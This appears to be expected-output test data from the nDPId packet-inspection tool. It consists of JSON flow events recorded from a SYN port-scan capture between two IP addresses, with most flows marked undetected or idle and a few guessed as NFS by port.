-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 